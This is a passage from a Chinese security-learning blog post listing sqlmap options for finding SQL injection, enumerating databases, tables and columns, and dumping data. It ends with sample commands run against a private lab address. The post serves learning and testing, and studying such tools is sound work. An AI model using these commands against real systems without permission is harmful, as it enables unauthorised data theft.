<h3 id="2-sqlmap的一些常用参数"><a href="#2-sqlmap的一些常用参数" class="headerlink" title="2. sqlmap的一些常用参数"></a>2. sqlmap的一些常用参数</h3><p>检查指定url是否存在sql注入<br>sqlmap.py -u url</p>
<p>当前正在使用的数据库名称<br>sqlmap.py -u url –current-db</p>
<p>当前正在使用的用户名<br>sqlmap.py -u url –current-user</p>
<p>列出所有数据库<br>sqlmap.py -u url –dbs</p>
<p>列出指定数据库的所有表<br>sqlmap.py -u url -D database –tables</p>
<p>指定库名和表名列出所有列名<br>sqlmap.py -u url -D database -T table –columns</p>
<p>获取全部列名数据<br>sqlmap.py -u url -D database -T table –dump</p>
<p>获取指定列名数据<br>sqlmap.py -u url -D database -T table -C column –dump</p>
<p>指定获取多少条数据<br>sqlmap.py -u url -D database -T table -C column  –start x –stop y –dump</p>
<p>延迟注入<br>sqlmap.py -u url –delay 2</p>
<p>最大http请求并发数量(线程)<br>sqlmap.py -u url –threads 10</p>
<h3 id="3-使用sqlmap实现注入"><a href="#3-使用sqlmap实现注入" class="headerlink" title="3. 使用sqlmap实现注入"></a>3. 使用sqlmap实现注入</h3><h4 id="3-1-检查是否存在sql注入"><a href="#3-1-检查是否存在sql注入" class="headerlink" title="3.1 检查是否存在sql注入"></a>3.1 检查是否存在sql注入</h4><p>paylaod：<code>py -3 sqlmap.py -u &quot;http://192.168.1.128/7/9/strsql.php&quot; --data=&quot;username=admin&quot; --batch</code><br>–data=”username=admin”    指定注入名，post方式提交。<br>–batch 默认值注入，不需要人为选择</p>
<h4 id="3-2-查询所有数据库"><a href="#3-2-查询所有数据库" class="headerlink" title="3.2 查询所有数据库"></a>3.2 查询所有数据库</h4><p>paylaod：<code>py -3 sqlmap.py -u &quot;http://192.168.1.128/7/9/strsql.php&quot; --data=&quot;username=admin&quot; -dbs</code><br>可以加入线程参数，–threads 10</p>
<p><strong>完结</strong></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">XiaoPu</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.xpctf.cn/posts/d106/">https://www.xpctf.cn/posts/d106/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.xpctf.cn" target="_blank">一只小白</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a></div><div class="post_share"><div class="social-share" data-image="https://img.xpctf.cn/img/202109151737709.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"/><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="post-qr-code__img" src="/img/wechat.jpg" alt="微信"/><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="post-qr-code__img" src="/img/alipay.jpg" alt="支付宝"/><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/posts/2f9a/"><img class="prev_cover" src="https://img.xpctf.cn/img/20200701211244.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">易锦靶场新手区SQL注入</div></div></a></div><div class="next-post pull_right"><a href="/posts/c70/"><img class="next_cover" src="https://img.xpctf.cn/img/20200530144523.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">SQL注入学习笔记1</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/posts/2c54/" title="MySQL数据库提权"><img class="relatedPosts_cover" src="https://img.xpctf.cn/img/20200722105009.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-07-22</div><div class="relatedPosts_title">MySQL数据库提权</div></div></a></div><div class="relatedPosts_item"><a href="/posts/c70/" title="SQL注入学习笔记1"><img class="relatedPosts_cover" src="https://img.xpctf.cn/img/20200530144523.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-06-17</div><div class="relatedPosts_title">SQL注入学习笔记1</div></div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div class="vcomment" id="vcomment"></div><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var requestSetting = function (from,set) {
  var from = from
  var setting = set.split(',').filter(function(item){
  return from.indexOf(item) > -1
  });
  setting = setting.length == 0 ? from :setting;
  return setting
}

var guestInfo = requestSetting(['nick','mail','link'],'nick,mail,link')
var requiredFields = requestSetting(['nick','mail','link'],'nick,mail')

window.valine = new Valine({
  el:'#vcomment',
  appId: 'adT2HesNUqwHDh4xp5GslrsX-gzGzoHsz',
  appKey: 'Mq44asxphpP9OIUwp6gCCOA7',
  notify: false,
  verify: true,
  placeholder: '(͒˶´⚇`˵)͒  快来留下你的小脚印吧~~',
  avatar: 'monsterid',
  meta: guestInfo,
  pageSize: '10',
  lang: 'zh-CN',
  recordIP: true,
  serverURLs: '',
  emojiCDN: '',
  emojiMaps: "",
  enableQQ: true,
  requiredFields: requiredFields
});</script></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By XiaoPu</div><div class="framework-info"><span>驱动 </span><a target="_blank" rel="noopener" href="https://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly"><span>Butterfly</span></a></div><div class="sitemap"><a href="/sitemap.xml"><span>Google地图</span></a><span class="footer-separator">|</span><a href="/baidusitemap.xml"><span>Baidu地图</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div></div><hr/><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@3/instantpage.min.js" type="module"></script><script src="/js/search/local-search.js"></script><script src="/live2d-widget/autoload.js"></script></body></html>